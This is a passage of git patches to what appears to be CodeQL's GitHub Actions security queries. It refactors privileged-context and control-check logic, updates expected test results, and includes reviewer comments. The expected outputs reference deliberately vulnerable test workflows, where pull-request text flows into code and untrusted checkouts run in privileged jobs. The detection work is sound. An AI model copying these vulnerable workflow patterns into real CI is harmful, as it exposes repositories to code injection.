From 43b61eb072615ac98509e19817540b7792b78eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:04:57 +0200 Subject: [PATCH 0536/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4c1252d976d..a8a194c52ba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.52 +version: 0.1.53 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a8c891b256a..e4cb8969649 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.52 +version: 0.1.53 groups: [actions, queries] suites: codeql-suites extractor: javascript From 153fb492f72724145785678206e81668ae114f76 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:14:37 +0200 Subject: [PATCH 0537/1267] Update tests --- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + .../Security/CWE-829/.github/workflows/untrusted_checkout3.yml | 2 +- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d2..609b09fdfef 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -438,6 +438,7 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index e0d32875ee7..0a38be8b12b 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -1,6 +1,6 @@ name: Test on: - workflow_call: + workflow_run: workflows: [Trigger] types: [completed] diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 13637396f90..afae2454078 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -274,6 +274,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | From b1ddbc9d13dab6b653f4c8aebdda2eb0df87635e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:25:56 +0200 Subject: [PATCH 0538/1267] Improve Control Checks --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/Helper.qll | 38 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 67 ++++++++--------- .../codeql/actions/security/ControlChecks.qll | 7 +- .../Security/CWE-074/OutputClobberingHigh.ql | 13 +--- .../CWE-077/EnvPathInjectionCritical.ql | 13 +--- .../CWE-077/EnvVarInjectionCritical.ql | 17 ++--- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 10 +-- .../CWE-349/CachePoisoningViaCodeInjection.ql | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 29 ++++---- .../CachePoisoningViaPoisonableStep.ql | 25 ++++--- .../UntrustedCheckoutTOCTOUCritical.ql | 16 ++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +-- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 5 +- .../CWE-829/UntrustedCheckoutCritical.ql | 12 +-- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-829/UntrustedCheckoutMedium.ql | 2 - .../CWE-094/CodeInjectionMedium.expected | 1 - .../UntrustedCheckoutCritical.expected | 73 ++++++++++--------- 22 files changed, 168 insertions(+), 217 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c83abb1ea1d..a1651eedc47 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -79,8 +79,6 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } - - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** 
@@ -200,7 +198,9 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } + predicate isPrivilegedExternallyTriggerable(Event event) { + super.isPrivilegedExternallyTriggerable(event) + } } abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 0df7b125019..9356950f571 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -238,44 +238,12 @@ predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run.getScript(), "GITHUB_PATH", path) } -predicate inPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedContext(AstNode node) { - inPrivilegedCompositeAction(node) - or - inPrivilegedExternallyTriggerableJob(node) -} - -predicate inNonPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - not a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inNonPrivilegedJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - not j.isPrivilegedExternallyTriggerable() - ) +predicate inPrivilegedContext(AstNode node, Event event) { + node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } predicate inNonPrivilegedContext(AstNode node) { - inNonPrivilegedCompositeAction(node) - or - inNonPrivilegedJob(node) + not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } string partialFileContentRegexp() { 
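Review bot: `inPrivilegedContext` and `inNonPrivilegedContext` in Helper.qll now rest entirely on `node.getEnclosingJob()`, so a node in a composite action with no caller job in the database has no enclosing job and satisfies `inNonPrivilegedContext` by default. The removed `inPrivilegedCompositeAction` went through `CompositeAction.isPrivilegedExternallyTriggerable()`, which (per the `CompositeActionImpl` predicate deleted in `ast/internal/Ast.qll` in this commit) also accepted the action's own `isPrivileged()`. That input appears to be dropped, which could lower the reported severity of some composite-action findings, so it is worth confirming this is intended. Neither helper has QLDoc; I would add `/** Holds if `node` is in a job that is privileged and externally triggerable by `event`; nodes in composite actions resolve through their caller jobs. */` on the first and a matching comment on the second.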
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7659661bdac..154d466ab7d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -359,18 +359,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { } EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } - - /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - // the action is externally triggerable - exists(JobImpl caller, EventImpl event | - caller = this.getACallerJob() and - event = caller.getATriggerEvent() and - event.isExternallyTriggerable() and - // the action is privileged - (this.isPrivileged() or caller.isPrivileged()) - ) - } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { 
@@ -970,31 +958,30 @@ class JobImpl extends AstNodeImpl, TJobNode { } /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | this.getATriggerEvent() = e | - // job is triggereable by an external user - e.isExternallyTriggerable() and - // no matter if `pull_request` is granted write permissions or access to secrets - // when the job is triggered by a `pull_request` event from a fork, they will get revoked - not e.getName() = "pull_request" and - ( - // job is privileged (write access or access to secrets) - this.isPrivileged() - or - // the trigger event is __normally__ privileged - e.isPrivileged() and - // and we have no runtime data to prove otherwise - not this.hasRuntimeData() and - // and the job is not explicitly non-privileged - not ( - ( - this.hasExplicitNonePermission() or - this.hasImplicitNonePermission() or - this.hasExplicitReadPermission() or - this.hasImplicitReadPermission() - ) and - not this.hasExplicitSecretAccess() - ) + predicate isPrivilegedExternallyTriggerable(EventImpl event) { + this.getATriggerEvent() = event and + // job is triggereable by an external user + event.isExternallyTriggerable() and + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not event.getName() = "pull_request" and + ( + // job is privileged (write access or access to secrets) + this.isPrivileged() + or + // the trigger event is __normally__ privileged + event.isPrivileged() and + // and we have no runtime data to prove otherwise + not this.hasRuntimeData() and + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() ) ) } 
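Review bot: The doc comment on `isPrivilegedExternallyTriggerable` still reads "Holds if the action is privileged and externally triggerable", but the predicate belongs to `JobImpl` and now takes the triggering event as a parameter. I would change it to `/** Holds if this job is privileged and can be triggered externally by `event`. */` and fix the "triggereable" typo in the first inline comment in the same pass. The comment should also say that `pull_request` is excluded by name, since that exclusion now decides for each event whether the Critical-level queries apply.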
@@ -1073,6 +1060,12 @@ class StepImpl extends AstNodeImpl, TStepNode { override YamlMapping getNode() { result = n } + override JobImpl getEnclosingJob() { + // if a step is within a composite action, we should follow the caller job + result = this.getEnclosingCompositeAction().getACallerJob() or + result = super.getEnclosingJob() + } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a3e1e15fe8..052b22cd338 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,9 +38,12 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event = step.getEnclosingWorkflow().getATriggerEvent() and + // The check dominates the step it should protect this.dominates(step) and - this.protectsCategoryAndEvent(category, event.getName()) + // The check is effective against the event and category + this.protectsCategoryAndEvent(category, event.getName()) and + // The check can be triggered by the event + this.getEnclosingJob().getATriggerEvent() = event } predicate dominates(Step step) { diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 0ead5aa7689..2000e2100ae 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql 
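Review bot: The `StepImpl.getEnclosingJob()` override looks redundant. `AstNodeImpl.getEnclosingJob()` already carries the disjunct `result = this.getEnclosingCompositeAction().getACallerJob()` (added in PATCH 0535, and untouched by this commit), so `super.getEnclosingJob()` already covers caller jobs. Keeping the composite-action rule in one place avoids the two definitions drifting apart, which matters because this predicate feeds the privileged-context decision. If the override is kept deliberately, its comment should say why the base-class rule is not enough.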
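Review bot: In `ControlCheck.protects`, `event` is now tied to the check's own job (`this.getEnclosingJob().getATriggerEvent() = event`) and no longer to `step`, so the predicate relies on callers passing an event that actually triggers the step's job. A short QLDoc would make that contract explicit, e.g. `/** Holds if this check dominates `step` and is effective for `category` when its job is triggered by `event`. */`. Separately, `step` is typed `Step` while the queries in this commit pass `sink.getNode().asExpr()`. Where that node is an expression rather than a step (CommandInjectionCritical casts its sink to `Expression`), the check presumably cannot match and the alert is reported anyway; this should be confirmed against `dominates`, whose body is outside this hunk.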
@@ -18,25 +18,20 @@ import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink, Event event where OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 9fa066d195c..54e013f1091 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
@@ -17,24 +17,19 @@ import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event where EnvPathInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 806bae2a91d..b301915d79c 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
@@ -18,30 +18,23 @@ import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Event event where EnvVarInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + check.protects(sink.getNode().asExpr(), event, "envvar-injection") ) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index f5a4aed3eca..80281e8db30 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql 
@@ -17,10 +17,10 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 6f1f6008a06..2626de31935 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -16,14 +16,12 @@ import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink, Event event where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ec4925d24a0..ef66ac229f2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
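Review bot: In CommandInjectionCritical.ql, `event` is bound by `inPrivilegedContext(sink.getNode().asExpr(), event)` but never used to consult a `ControlCheck`. The sibling queries changed in this commit (ArgumentInjectionCritical, CodeInjectionCritical, EnvVarInjectionCritical) all exclude sinks where `check.protects(sink.getNode().asExpr(), event, …)` holds. If this is intentional, presumably because no control-check category covers command injection, a comment would stop the next reader from treating it as an omission: `// no ControlCheck category applies here; event only witnesses a privileged, externally triggerable job`. Otherwise the query will keep reporting workflows that gate the step behind an actor or permission check.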
+++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -19,15 +19,11 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event event where CodeInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") - ) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 67b615d115a..411d0052d4b 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql 
@@ -18,27 +18,27 @@ import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob job, Event event where CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and - j.getATriggerEvent() = e and + job = sink.getNode().asExpr().getEnclosingJob() and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and // the checkout is not controlled by an access check not exists(ControlCheck check | - check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and + not job.isPrivileged() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index b6df022329d..bda8224925e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql 
@@ -43,10 +43,10 @@ predicate controlledCachePath(string cache_path, string untrusted_path) { query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and 
@@ -58,35 +58,36 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job writes to the cache // (No need to follow the checkout/download step since the cache is normally write after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and + job.getAStep() = step and + step instanceof CacheWritingStep and ( // we dont know what code can be controlled by the attacker path = "?" or // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" + step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) ) and - not s instanceof PoisonableStep -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not step instanceof PoisonableStep +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message 
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 0750a02930e..74f49fccd30 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -20,10 +20,10 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and 
@@ -35,26 +35,27 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and + source.getAFollowingStep() = step and + step instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not job.isPrivileged() +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 7c7ab15de31..11897c464bf 100644 --- 